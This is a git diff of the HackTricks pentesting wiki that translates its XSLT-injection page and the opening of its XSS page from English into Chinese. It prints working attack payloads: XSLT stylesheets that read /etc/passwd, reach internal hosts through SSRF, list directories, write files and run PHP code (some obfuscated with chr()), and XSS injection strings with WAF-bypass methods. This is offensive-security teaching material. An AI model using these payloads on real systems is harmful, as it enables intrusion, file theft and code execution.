- Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')"
+Version: <xsl:value-of select="system-property('xsl:version')" /><br />
+Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
+Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
+<xsl:if test="system-property('xsl:product-name')">
+Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br />
+</xsl:if>
+<xsl:if test="system-property('xsl:product-version')">
+Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br />
+</xsl:if>
+<xsl:if test="system-property('xsl:is-schema-aware')">
+Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br />
+</xsl:if>
+<xsl:if test="system-property('xsl:supports-serialization')">
+Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')"
 /><br />
- </xsl:if>
- <xsl:if test="system-property('xsl:supports-backwards-compatibility')">
- Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')"
+</xsl:if>
+<xsl:if test="system-property('xsl:supports-backwards-compatibility')">
+Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')"
 /><br />
- </xsl:if>
+</xsl:if>
 </xsl:template>
 </xsl:stylesheet>
 ```
-
-And execute
-
+并执行
 ```xml
 $saxonb-xslt -xsl:detection.xsl xml.xml
 
 Warning: at xsl:stylesheet on line 2 column 80 of detection.xsl:
-  Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
+Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
 <h2>XSLT identification</h2><b>Version:</b>2.0<br><b>Vendor:</b>SAXON 9.1.0.8 from Saxonica<br><b>Vendor URL:</b>http://www.saxonica.com/<br>
 ```
-
-### Read Local File
-
+### 读取本地文件
 ```xml:read.xsl
 <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
 <xsl:template match="/">
@@ -135,7 +126,7 @@ Warning: at xsl:stylesheet on line 2 column 80 of detection.xsl:
 $ saxonb-xslt -xsl:read.xsl xml.xml
 
 Warning: at xsl:stylesheet on line 1 column 111 of read.xsl:
-  Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
+Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
 <?xml version="1.0" encoding="UTF-8"?>root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
@@ -145,9 +136,7 @@ games:x:5:60:games:/usr/games:/usr/sbin/nologin
 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 ```
-
 ### SSRF
-
 ```xml
 <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
 <xsl:include href="http://127.0.0.1:8000/xslt"/>
@@ -155,56 +144,50 @@ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 </xsl:template>
 </xsl:stylesheet>
 ```
+### 版本
 
-### Versions
-
-There might be more or less functions depending on the XSLT version used:
+根据使用的 XSLT 版本，可能会有更多或更少的功能：
 
 - [https://www.w3.org/TR/xslt-10/](https://www.w3.org/TR/xslt-10/)
 - [https://www.w3.org/TR/xslt20/](https://www.w3.org/TR/xslt20/)
 - [https://www.w3.org/TR/xslt-30/](https://www.w3.org/TR/xslt-30/)
 
-## Fingerprint
-
-Upload this and take information
+## 指纹
 
+上传此文件并获取信息
 ```xml
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
 <xsl:template match="/">
- Version: <xsl:value-of select="system-property('xsl:version')" /><br />
- Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
- Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
- <xsl:if test="system-property('xsl:product-name')">
- Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br />
- </xsl:if>
- <xsl:if test="system-property('xsl:product-version')">
- Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br />
- </xsl:if>
- <xsl:if test="system-property('xsl:is-schema-aware')">
- Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br />
- </xsl:if>
- <xsl:if test="system-property('xsl:supports-serialization')">
- Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')"
+Version: <xsl:value-of select="system-property('xsl:version')" /><br />
+Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
+Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
+<xsl:if test="system-property('xsl:product-name')">
+Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br />
+</xsl:if>
+<xsl:if test="system-property('xsl:product-version')">
+Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br />
+</xsl:if>
+<xsl:if test="system-property('xsl:is-schema-aware')">
+Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br />
+</xsl:if>
+<xsl:if test="system-property('xsl:supports-serialization')">
+Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')"
 /><br />
- </xsl:if>
- <xsl:if test="system-property('xsl:supports-backwards-compatibility')">
- Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')"
+</xsl:if>
+<xsl:if test="system-property('xsl:supports-backwards-compatibility')">
+Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')"
 /><br />
- </xsl:if>
+</xsl:if>
 </xsl:template>
 </xsl:stylesheet>
 ```
-
 ## SSRF
-
 ```xml
 <esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl">
 </esi:include>
 ```
-
-## Javascript Injection
-
+## Javascript 注入
 ```xml
 <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
 <xsl:template match="/">
@@ -212,11 +195,9 @@ Upload this and take information
 </xsl:template>
 </xsl:stylesheet>
 ```
-
-## Directory listing (PHP)
+## 目录列表 (PHP)
 
 ### **Opendir + readdir**
-
 ```xml
 <?xml version="1.0" encoding="utf-8"?>
 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
@@ -233,23 +214,19 @@ Upload this and take information
 <xsl:value-of select="php:function('readdir')"/> -
 </xsl:template></xsl:stylesheet>
 ```
-
-### **Assert (var_dump + scandir + false)**
-
+### **断言 (var_dump + scandir + false)**
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
-    <body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
-        <xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)))==3')" />
-        <br />
-    </body>
+<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
+<xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)))==3')" />
+<br />
+</body>
 </html>
 ```
+## 读取文件
 
-## Read files
-
-### **Internal - PHP**
-
+### **内部 - PHP**
 ```xml
 <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
 <xsl:template match="/">
@@ -257,9 +234,7 @@ Upload this and take information
 </xsl:template>
 </xsl:stylesheet>
 ```
-
-### **Internal - XXE**
-
+### **内部 - XXE**
 ```xml
 <?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "/etc/passwd">]>
@@ -269,9 +244,7 @@ Upload this and take information
 </xsl:template>
 </xsl:stylesheet>
 ```
-
-### **Through HTTP**
-
+### **通过HTTP**
 ```xml
 <?xml version="1.0" encoding="utf-8"?>
 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
@@ -288,9 +261,7 @@ Upload this and take information
 &passwd;
 </xsl:template>
 ```
-
-### **Internal (PHP-function)**
-
+### **内部 (PHP函数)**
 ```xml
 <?xml version="1.0" encoding="utf-8"?>
 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
@@ -303,15 +274,13 @@ Upload this and take information
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
-    <body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
-        <xsl:copy-of name="asd" select="php:function('assert','var_dump(file_get_contents(scandir(chr(46).chr(47))[2].chr(47).chr(46).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100)))==3')" />
-        <br />
-    </body>
+<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
+<xsl:copy-of name="asd" select="php:function('assert','var_dump(file_get_contents(scandir(chr(46).chr(47))[2].chr(47).chr(46).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100)))==3')" />
+<br />
+</body>
 </html>
 ```
-
-### Port scan
-
+### 端口扫描
 ```xml
 <?xml version="1.0" encoding="utf-8"?>
 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
@@ -320,11 +289,9 @@ Upload this and take information
 </xsl:template>
 </xsl:stylesheet>
 ```
-
-## Write to a file
+## 写入文件
 
 ### XSLT 2.0
-
 ```xml
 <?xml version="1.0" encoding="utf-8"?>
 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
@@ -335,9 +302,7 @@ Upload this and take information
 </xsl:template>
 </xsl:stylesheet>
 ```
-
-### **Xalan-J extension**
-
+### **Xalan-J 扩展**
 ```xml
 <xsl:template match="/">
 <redirect:open file="local_file.txt"/>
@@ -345,11 +310,9 @@ Upload this and take information
 <redirect:close file="loxal_file.txt"/>
 </xsl:template>
 ```
+在PDF中写入文件的其他方法
 
-Other ways to write files in the PDF
-
-## Include external XSL
-
+## 包含外部XSL
 ```xml
 <xsl:include href="http://extenal.web/external.xsl"/>
 ```
@@ -358,11 +321,9 @@ Other ways to write files in the PDF
 <?xml version="1.0" ?>
 <?xml-stylesheet type="text/xsl" href="http://external.web/ext.xsl"?>
 ```
-
-## Execute code
+## 执行代码
 
 ### **php:function**
-
 ```xml
 <?xml version="1.0" encoding="utf-8"?>
 <xsl:stylesheet version="1.0"
@@ -383,17 +344,15 @@ xmlns:php="http://php.net/xsl" >
 </body>
 </html>
 ```
+执行代码使用其他框架在 PDF 中
 
-Execute code using other frameworks in the PDF
+### **更多语言**
 
-### **More Languages**
+**在此页面中，您可以找到其他语言中 RCE 的示例：** [**https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection#C%23%2FVB.NET%2FASP.NET**](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection#C%23%2FVB.NET%2FASP.NET) **（C#、Java、PHP）**
 
-**In this page you can find examples of RCE in other languajes:** [**https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection#C%23%2FVB.NET%2FASP.NET**](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection#C%23%2FVB.NET%2FASP.NET) **(C#, Java, PHP)**
-
-## **Access PHP static functions from classes**
-
-The following function will call the static method `stringToUrl` of the class XSL:
+## **从类中访问 PHP 静态函数**
 
+以下函数将调用类 XSL 的静态方法 `stringToUrl`：
 ```xml
 <!--- More complex test to call php class function-->
 <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"
@@ -408,23 +367,19 @@ version="1.0">
 </xsl:template>
 </xsl:stylesheet>
 ```
+## 更多有效载荷
 
-(Example from [http://laurent.bientz.com/Blog/Entry/Item/using_php_functions_in_xsl-7.sls](http://laurent.bientz.com/Blog/Entry/Item/using_php_functions_in_xsl-7.sls))
+- 查看 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection)
+- 查看 [https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
 
-## More Payloads
-
-- Check [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection)
-- Check [https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
-
-## **Brute-Force Detection List**
+## **暴力破解检测列表**
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt" %}
 
-## **References**
+## **参考文献**
 
 - [XSLT_SSRF](https://feelsec.info/wp-content/uploads/2018/11/XSLT_SSRF.pdf)\\
 - [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf)\\
 - [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/README.md b/src/pentesting-web/xss-cross-site-scripting/README.md
index 036976f3c..811bb00ba 100644
--- a/src/pentesting-web/xss-cross-site-scripting/README.md
+++ b/src/pentesting-web/xss-cross-site-scripting/README.md
@@ -1,100 +1,96 @@
-# XSS (Cross Site Scripting)
+# XSS (跨站脚本攻击)
 
 <figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘！** (_需要流利的波兰语书写和口语能力_).
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
-## Methodology
+## 方法论
 
-1. Check if **any value you control** (_parameters_, _path_, _headers_?, _cookies_?) is being **reflected** in the HTML or **used** by **JS** code.
-2. **Find the context** where it's reflected/used.
-3. If **reflected**
-   1. Check **which symbols can you use** and depending on that, prepare the payload:
-      1. In **raw HTML**:
-         1. Can you create new HTML tags?
-         2. Can you use events or attributes supporting `javascript:` protocol?
-         3. Can you bypass protections?
-         4. Is the HTML content being interpreted by any client side JS engine (_AngularJS_, _VueJS_, _Mavo_...), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md).
-         5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/)?
-      2. Inside a **HTML tag**:
-         1. Can you exit to raw HTML context?
-         2. Can you create new events/attributes to execute JS code?
-         3. Does the attribute where you are trapped support JS execution?
-         4. Can you bypass protections?
-      3. Inside **JavaScript code**:
-         1. Can you escape the `<script>` tag?
-         2. Can you escape the string and execute different JS code?
-         3. Are your input in template literals \`\`?
-         4. Can you bypass protections?
-      4. Javascript **function** being **executed**
-         1. You can indicate the name of the function to execute. e.g.: `?callback=alert(1)`
-4. If **used**:
-   1. You could exploit a **DOM XSS**, pay attention how your input is controlled and if your **controlled input is used by any sink.**
+1. 检查**你控制的任何值** (_参数_，_路径_，_头部_？，_cookies_？) 是否在HTML中被**反射**或被**JS**代码**使用**。
+2. **找到反射/使用的上下文**。
+3. 如果**被反射**：
+1. 检查**你可以使用哪些符号**，并根据此准备有效载荷：
+1. 在**原始HTML**中：
+1. 你能创建新的HTML标签吗？
+2. 你能使用支持`javascript:`协议的事件或属性吗？
+3. 你能绕过保护措施吗？
+4. HTML内容是否被任何客户端JS引擎 (_AngularJS_，_VueJS_，_Mavo_...) 解释，你可以利用[**客户端模板注入**](../client-side-template-injection-csti.md)。
+5. 如果你不能创建执行JS代码的HTML标签，你能利用[**悬挂标记 - 无脚本HTML注入**](../dangling-markup-html-scriptless-injection/)吗？
+2. 在**HTML标签**内：
+1. 你能退出到原始HTML上下文吗？
+2. 你能创建新的事件/属性来执行JS代码吗？
+3. 你被困的属性是否支持JS执行？
+4. 你能绕过保护措施吗？
+3. 在**JavaScript代码**内：
+1. 你能逃脱`<script>`标签吗？
+2. 你能逃脱字符串并执行不同的JS代码吗？
+3. 你的输入是否在模板字面量\`\`中？
+4. 你能绕过保护措施吗？
+4. 被**执行的JavaScript函数**：
+1. 你可以指明要执行的函数名称。例如：`?callback=alert(1)`
+4. 如果**被使用**：
+1. 你可以利用**DOM XSS**，注意你的输入是如何被控制的，以及你的**受控输入是否被任何接收器使用**。
 
-When working on a complex XSS you might find interesting to know about:
+在处理复杂的XSS时，你可能会发现了解以下内容很有趣：
 
 {{#ref}}
 debugging-client-side-js.md
 {{#endref}}
 
-## Reflected values
+## 反射值
 
-In order to successfully exploit a XSS the first thing you need to find is a **value controlled by you that is being reflected** in the web page.
+为了成功利用XSS，首先你需要找到一个**由你控制的被反射的值**在网页中。
 
-- **Intermediately reflected**: If you find that the value of a parameter or even the path is being reflected in the web page you could exploit a **Reflected XSS**.
-- **Stored and reflected**: If you find that a value controlled by you is saved in the server and is reflected every time you access a page you could exploit a **Stored XSS**.
-- **Accessed via JS**: If you find that a value controlled by you is being access using JS you could exploit a **DOM XSS**.
+- **中间反射**：如果你发现参数的值甚至路径在网页中被反射，你可以利用**反射XSS**。
+- **存储和反射**：如果你发现一个由你控制的值被保存在服务器中，并且每次访问页面时都会被反射，你可以利用**存储XSS**。
+- **通过JS访问**：如果你发现一个由你控制的值正在通过JS访问，你可以利用**DOM XSS**。
 
-## Contexts
+## 上下文
 
-When trying to exploit a XSS the first thing you need to know if **where is your input being reflected**. Depending on the context, you will be able to execute arbitrary JS code on different ways.
+在尝试利用XSS时，首先你需要知道**你的输入被反射在哪里**。根据上下文，你将能够以不同的方式执行任意JS代码。
 
-### Raw HTML
+### 原始HTML
 
-If your input is **reflected on the raw HTML** page you will need to abuse some **HTML tag** in order to execute JS code: `<img , <iframe , <svg , <script` ... these are just some of the many possible HTML tags you could use.\
-Also, keep in mind [Client Side Template Injection](../client-side-template-injection-csti.md).
+如果你的输入在**原始HTML**页面中被**反射**，你需要利用某些**HTML标签**来执行JS代码：`<img，<iframe，<svg，<script` ... 这些只是你可以使用的许多可能的HTML标签中的一些。\
+此外，请记住[客户端模板注入](../client-side-template-injection-csti.md)。
 
-### Inside HTML tags attribute
+### 在HTML标签属性内
 
-If your input is reflected inside the value of the attribute of a tag you could try:
+如果你的输入在标签的属性值中被反射，你可以尝试：
 
-1. To **escape from the attribute and from the tag** (then you will be in the raw HTML) and create new HTML tag to abuse: `"><img [...]`
-2. If you **can escape from the attribute but not from the tag** (`>` is encoded or deleted), depending on the tag you could **create an event** that executes JS code: `" autofocus onfocus=alert(1) x="`
-3. If you **cannot escape from the attribute** (`"` is being encoded or deleted), then depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked. Another interesting **example** is the attribute `href`, where you can use the `javascript:` protocol to execute arbitrary code: **`href="javascript:alert(1)"`**
-4. If your input is reflected inside "**unexpoitable tags**" you could try the **`accesskey`** trick to abuse the vuln (you will need some kind of social engineer to exploit this): **`" accesskey="x" onclick="alert(1)" x="`**
-
-Weird example of Angular executing XSS if you controls a class name:
+1. **从属性和标签中逃脱**（然后你将处于原始HTML中）并创建新的HTML标签进行利用：`"><img [...]`
+2. 如果你**可以从属性中逃脱但不能从标签中逃脱**（`>`被编码或删除），根据标签你可以**创建一个事件**来执行JS代码：`" autofocus onfocus=alert(1) x="`
+3. 如果你**无法从属性中逃脱**（`"`被编码或删除），那么根据**你的值被反射在哪个属性**中**如果你控制整个值或仅部分值**你将能够利用它。例如，如果你控制一个事件如`onclick=`，你将能够使其在点击时执行任意代码。另一个有趣的**例子**是属性`href`，你可以使用`javascript:`协议来执行任意代码：**`href="javascript:alert(1)"`**
+4. 如果你的输入在“**不可利用的标签**”中被反射，你可以尝试**`accesskey`**技巧来利用这个漏洞（你将需要某种社会工程来利用这一点）：**`" accesskey="x" onclick="alert(1)" x="`**
 
+奇怪的例子是Angular执行XSS，如果你控制一个类名：
 ```html
 <div ng-app>
-  <strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
+<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
 </div>
 ```
-
 ### Inside JavaScript code
 
-In this case your input is reflected between **`<script> [...] </script>`** tags of a HTML page, inside a `.js` file or inside an attribute using **`javascript:`** protocol:
-
-- If reflected between **`<script> [...] </script>`** tags, even if your input if inside any kind of quotes, you can try to inject `</script>` and escape from this context. This works because the **browser will first parse the HTML tags** and then the content, therefore, it won't notice that your injected `</script>` tag is inside the HTML code.
-- If reflected **inside a JS string** and the last trick isn't working you would need to **exit** the string, **execute** your code and **reconstruct** the JS code (if there is any error, it won't be executed:
-  - `'-alert(1)-'`
-  - `';-alert(1)//`
-  - `\';alert(1)//`
-- If reflected inside template literals you can **embed JS expressions** using `${ ... }` syntax: `` var greetings = `Hello, ${alert(1)}` ``
-- **Unicode encode** works to write **valid javascript code**:
+在这种情况下，您的输入反映在 HTML 页面中的 **`<script> [...] </script>`** 标签之间，或者在 `.js` 文件中，或在使用 **`javascript:`** 协议的属性中：
 
+- 如果反映在 **`<script> [...] </script>`** 标签之间，即使您的输入在任何类型的引号内，您可以尝试注入 `</script>` 并从此上下文中逃脱。这是有效的，因为 **浏览器会首先解析 HTML 标签** 然后解析内容，因此，它不会注意到您注入的 `</script>` 标签在 HTML 代码中。
+- 如果反映 **在 JS 字符串内**，并且最后一个技巧不起作用，您需要 **退出** 字符串，**执行** 您的代码并 **重构** JS 代码（如果有任何错误，它将不会被执行）：
+- `'-alert(1)-'`
+- `';-alert(1)//`
+- `\';alert(1)//`
+- 如果反映在模板字面量中，您可以使用 `${ ... }` 语法 **嵌入 JS 表达式**： `` var greetings = `Hello, ${alert(1)}` ``
+- **Unicode 编码** 可用于编写 **有效的 javascript 代码**：
 ```javascript
 alert(1)
 alert(1)
 alert(1)
 ```
-
 #### Javascript Hoisting
 
-Javascript Hoisting references the opportunity to **declare functions, variables or classes after they are used so you can abuse scenarios where a XSS is using undeclared variables or functions.**\
-**Check the following page for more info:**
+Javascript Hoisting 指的是**在使用后声明函数、变量或类的机会，因此您可以利用使用未声明的变量或函数的 XSS 场景。**\
+**有关更多信息，请查看以下页面：**
 
 {{#ref}}
 js-hoisting.md
@@ -102,20 +98,19 @@ js-hoisting.md
 
 ### Javascript Function
 
-Several web pages have endpoints that **accept as parameter the name of the function to execute**. A common example to see in the wild is something like: `?callback=callbackFunc`.
+一些网页有端点**接受作为参数要执行的函数名称**。在实际中常见的例子是类似于：`?callback=callbackFunc`。
 
-A good way to find out if something given directly by the user is trying to be executed is **modifying the param value** (for example to 'Vulnerable') and looking in the console for errors like:
+找出用户直接提供的内容是否尝试被执行的一个好方法是**修改参数值**（例如改为 'Vulnerable'），并在控制台中查找错误，例如：
 
 ![](<../../images/image (711).png>)
 
-In case it's vulnerable, you could be able to **trigger an alert** just doing sending the value: **`?callback=alert(1)`**. However, it' very common that this endpoints will **validate the content** to only allow letters, numbers, dots and underscores (**`[\w\._]`**).
+如果它是脆弱的，您可以通过发送值**`?callback=alert(1)`**来**触发一个警报**。然而，这些端点通常会**验证内容**，只允许字母、数字、点和下划线（**`[\w\._]`**）。
 
-However, even with that limitation it's still possible to perform some actions. This is because you can use that valid chars to **access any element in the DOM**:
+然而，即使有这个限制，仍然可以执行一些操作。这是因为您可以使用这些有效字符来**访问 DOM 中的任何元素**：
 
 ![](<../../images/image (747).png>)
 
-Some useful functions for this:
-
+一些有用的函数：
 ```
 firstElementChild
 lastElementChild
@@ -123,12 +118,11 @@ nextElementSibiling
 lastElementSibiling
 parentElement
 ```
+您还可以尝试直接**触发 Javascript 函数**：`obj.sales.delOrders`。
 
-You can also try to **trigger Javascript functions** directly: `obj.sales.delOrders`.
+然而，通常执行指定函数的端点是没有太多有趣 DOM 的端点，**同一源中的其他页面**将具有**更有趣的 DOM**以执行更多操作。
 
-However, usually the endpoints executing the indicated function are endpoints without much interesting DOM, **other pages in the same origin** will have a **more interesting DOM** to perform more actions.
-
-Therefore, in order to **abuse this vulnerability in a different DOM** the **Same Origin Method Execution (SOME)** exploitation was developed:
+因此，为了**在不同 DOM 中滥用此漏洞**，开发了**同源方法执行 (SOME)** 利用：
 
 {{#ref}}
 some-same-origin-method-execution.md
@@ -136,16 +130,16 @@ some-same-origin-method-execution.md
 
 ### DOM
 
-There is **JS code** that is using **unsafely** some **data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
+有**JS 代码**正在**不安全地**使用一些**由攻击者控制的数据**，如 `location.href`。攻击者可以利用这一点执行任意 JS 代码。
 
 {{#ref}}
 dom-xss.md
 {{#endref}}
 
-### **Universal XSS**
+### **通用 XSS**
 
-These kind of XSS can be found **anywhere**. They not depend just on the client exploitation of a web application but on **any** **context**. These kind of **arbitrary JavaScript execution** can even be abuse to obtain **RCE**, **read** **arbitrary** **files** in clients and servers, and more.\
-Some **examples**:
+这种类型的 XSS 可以在**任何地方**找到。它们不仅依赖于对 Web 应用程序的客户端利用，还依赖于**任何****上下文**。这种**任意 JavaScript 执行**甚至可以被滥用以获得**RCE**、**读取****任意****文件**在客户端和服务器上，等等。\
+一些**示例**：
 
 {{#ref}}
 server-side-xss-dynamic-pdf.md
@@ -155,45 +149,40 @@ server-side-xss-dynamic-pdf.md
 ../../network-services-pentesting/pentesting-web/electron-desktop-apps/
 {{#endref}}
 
-## WAF bypass encoding image
+## WAF 绕过编码图像
 
-![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](<../../images/EauBb2EX0AERaNK (1).jpg>)
+![来自 https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](<../../images/EauBb2EX0AERaNK (1).jpg>)
 
-## Injecting inside raw HTML
+## 在原始 HTML 中注入
 
-When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\
-For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
-&#xNAN;_**Note: A HTML comment can be closed using\*\*\*\*\*\***&#x20;\***\*`-->`\*\***&#x20;\***\*or \*\*\*\*\*\***`--!>`\*\*_
-
-In this case and if no black/whitelisting is used, you could use payloads like:
+当您的输入在**HTML 页面**中被反射，或者您可以在此上下文中转义并注入 HTML 代码时，您需要做的**第一**件事是检查您是否可以滥用 `<` 来创建新标签：只需尝试**反射**该**字符**并检查它是否被**HTML 编码**或**删除**，或者是否**未更改地反射**。**只有在最后一种情况下，您才能利用此情况**。\
+对于这些情况，还**请记住** [**客户端模板注入**](../client-side-template-injection-csti.md)**。**\
+&#xNAN;_**注意：HTML 注释可以使用\*\*\*\*\*\***&#x20;\***\*`-->`\*\***&#x20;\***\*或 \*\*\*\*\*\***`--!>`\*\**_
 
+在这种情况下，如果没有使用黑/白名单，您可以使用以下有效负载：
 ```html
 <script>
-  alert(1)
+alert(1)
 </script>
 <img src="x" onerror="alert(1)" />
 <svg onload=alert('XSS')>
 ```
+但是，如果使用了标签/属性的黑白名单，您需要**暴力破解可以创建的标签**。\
+一旦您**找到了允许的标签**，您需要**暴力破解**在找到的有效标签内的属性/事件，以查看如何攻击该上下文。
 
-But, if tags/attributes black/whitelisting is being used, you will need to **brute-force which tags** you can create.\
-Once you have **located which tags are allowed**, you would need to **brute-force attributes/events** inside the found valid tags to see how you can attack the context.
+### 标签/事件暴力破解
 
-### Tags/Events brute-force
+访问 [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)，然后点击 _**复制标签到剪贴板**_。然后，使用 Burp intruder 发送所有标签，并检查是否有任何标签未被 WAF 识别为恶意。一旦您发现可以使用的标签，您可以使用有效标签**暴力破解所有事件**（在同一网页上点击 _**复制事件到剪贴板**_，并按照之前的相同程序进行操作）。
 
-Go to [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) and click on _**Copy tags to clipboard**_. Then, send all of them using Burp intruder and check if any tags wasn't discovered as malicious by the WAF. Once you have discovered which tags you can use, you can **brute force all the events** using the valid tags (in the same web page click on _**Copy events to clipboard**_ and follow the same procedure as before).
-
-### Custom tags
-
-If you didn't find any valid HTML tag, you could try to **create a custom tag** and and execute JS code with the `onfocus` attribute. In the XSS request, you need to end the URL with `#` to make the page **focus on that object** and **execute** the code:
+### 自定义标签
 
+如果您没有找到任何有效的 HTML 标签，您可以尝试**创建一个自定义标签**并使用 `onfocus` 属性执行 JS 代码。在 XSS 请求中，您需要以 `#` 结束 URL，以使页面**聚焦于该对象**并**执行**代码：
 ```
